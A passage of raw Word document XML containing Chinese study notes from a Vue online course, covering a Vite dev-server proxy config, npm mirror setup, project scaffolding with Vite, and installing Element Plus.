          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>baseURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该配置在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> axios.js </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8A6CF" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  server: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4452A" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRPr="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9456A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E9456A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>host: '0.0.0.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE40A9" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRPr="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9456A">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    port: 80,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B937C85" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    proxy: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741CCE15" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      '/api': {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AFEAF" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        target: 'http://127.0.0.1:8000/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A92735" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        changeOrigin: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52521FD4" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        rewrite: (path) =&gt; path.replace(/^\/api/, ''),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339BE05B" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFAE2D0" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDC4B03" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3678E6" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C8DBFC" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  plugins: [vue(),WindiCSS()],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB19A5" w14:textId="02AC1084" w:rsidR="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A70FE15" w14:textId="77777777" w:rsidR="00E9456A" w:rsidRPr="00E9456A" w:rsidRDefault="00E9456A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D021201" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277E6CA9" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE36885" w14:textId="77777777" w:rsidR="00926A4A" w:rsidRDefault="00926A4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2028236A" w14:textId="11DD5E52" w:rsidR="00954DB1" w:rsidRDefault="00954DB1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="680" w:name="_Toc159780110"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网课</w:t>
      </w:r>
      <w:bookmarkEnd w:id="680"/>
    </w:p>
    <w:p w14:paraId="385091B6" w14:textId="77777777" w:rsidR="008474C3" w:rsidRDefault="008474C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BA58798" w14:textId="34AA4339" w:rsidR="008474C3" w:rsidRPr="008474C3" w:rsidRDefault="008474C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008474C3">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">项目默认是可以改代码然后页面直接刷新的，不需要 </w:t>
      </w:r>
      <w:r w:rsidRPr="008474C3">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">npm run dev </w:t>
      </w:r>
      <w:r w:rsidRPr="008474C3">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>重启。如果无法热启动，说明路径下有中文，更换一个没有中文的路径即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D0DA4" w14:textId="77777777" w:rsidR="008474C3" w:rsidRPr="008474C3" w:rsidRDefault="008474C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FC4E6D" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE4FA0D" w14:textId="6C67549D" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="681" w:name="_Toc159780111"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装与运行</w:t>
      </w:r>
      <w:r w:rsidR="00FF44BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00FF44BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vite</w:t>
      </w:r>
      <w:r w:rsidR="00FF44BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建项目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="681"/>
    </w:p>
    <w:p w14:paraId="634775F1" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRPr="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBCDB93" w14:textId="4E048208" w:rsidR="00954DB1" w:rsidRDefault="00367BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nodejs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下载一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA62BD3" w14:textId="77777777" w:rsidR="00367BE0" w:rsidRDefault="00367BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61331DDA" w14:textId="05675DD6" w:rsidR="00954DB1" w:rsidRPr="00FF44BF" w:rsidRDefault="00954DB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF44BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>vite</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF44BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>官方网站：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0110985B" w14:textId="620344F2" w:rsidR="00954DB1" w:rsidRDefault="00954DB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF44BF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://vitejs.dev/guide/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3469C0" w14:textId="77777777" w:rsidR="00954DB1" w:rsidRDefault="00954DB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4974E0FB" w14:textId="77777777" w:rsidR="00367BE0" w:rsidRDefault="00367BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D52D038" w14:textId="3680A3FF" w:rsidR="00367BE0" w:rsidRDefault="00367BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看当前镜像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>pm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>config get registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1AA796" w14:textId="36FB300C" w:rsidR="00367BE0" w:rsidRDefault="00367BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidRPr="003B1786">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://registry.npmmirror.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是国内镜像，如果不是，则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06243D33" w14:textId="6D31374E" w:rsidR="00367BE0" w:rsidRDefault="00367BE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm config set registry=</w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidRPr="003B1786">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://registry.npmmirror.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0FA734AF" w14:textId="77777777" w:rsidR="00954DB1" w:rsidRDefault="00954DB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481DC51C" w14:textId="4450B795" w:rsidR="00954DB1" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大版本不同的话，这个命令不太一样）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231116EF" w14:textId="453E92BB" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">pm init vite@latest </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>shop-admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- --template vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E0374" w14:textId="1C3EB2AD" w:rsidR="00C67EAA" w:rsidRPr="00BB5A3E" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d shop-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA71FBD" w14:textId="326981E8" w:rsidR="00C67EAA" w:rsidRPr="00BB5A3E" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pm install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438C3574" w14:textId="34B8F03A" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5A3E">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pm run dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221177C2" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087442E1" w14:textId="3AE3D707" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到当前的项目就运行起来了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ED6C12" w14:textId="77777777" w:rsidR="00876A4E" w:rsidRDefault="00876A4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADF5E2F" w14:textId="77777777" w:rsidR="00876A4E" w:rsidRDefault="00876A4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2611A6D3" w14:textId="77777777" w:rsidR="00876A4E" w:rsidRDefault="00876A4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C08CA4" w14:textId="77777777" w:rsidR="00876A4E" w:rsidRDefault="00876A4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A9E856" w14:textId="77777777" w:rsidR="00876A4E" w:rsidRDefault="00876A4E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D057EF" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="300288EB" w14:textId="1E743996" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="682" w:name="_Toc159780112"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>El</w:t>
      </w:r>
      <w:r>
        <w:t>ementPlus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="682"/>
    </w:p>
    <w:p w14:paraId="0B983C1F" w14:textId="77777777" w:rsidR="00954DB1" w:rsidRDefault="00954DB1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2E591A" w14:textId="77777777" w:rsidR="00D405A5" w:rsidRDefault="00D405A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341B7532" w14:textId="6CB4D68B" w:rsidR="00D405A5" w:rsidRDefault="00D405A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405A5">
        <w:t>https://element-plus.org/zh-CN/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D22D5B8" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA2F46A" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0B568A" w14:textId="4115CEE6" w:rsidR="00D405A5" w:rsidRDefault="00D405A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cnpm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装顺利</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B58F947" w14:textId="232619B0" w:rsidR="00C67EAA" w:rsidRPr="008474C3" w:rsidRDefault="00893755" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008474C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="008474C3">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pm install element-plus --save</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551AA52" w14:textId="77777777" w:rsidR="00893755" w:rsidRPr="00FE7EC6" w:rsidRDefault="00893755" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10142398" w14:textId="4341056F" w:rsidR="00C67EAA" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问组件网站：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF15EE" w14:textId="137933FD" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:t>https://element-plus.org/zh-CN/component/button.html#%E5%9F%BA%E7%A1%80%E7%94%A8%E6%B3%95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A538A8" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5543DF10" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21DA13A3" w14:textId="072DF0CC" w:rsidR="00C67EAA" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组件样式进入后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB9A6A" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454F24EE" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E1DE4E" w14:textId="466C1338" w:rsidR="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ain.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F5BC9" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import './assets/main.css'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038119FF" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACEF54D" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A46D6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import {createApp} from 'vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A53E26" w14:textId="77777777" w:rsidR="004A46D6" w:rsidRPr="004A46D6" w:rsidRDefault="004A46D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
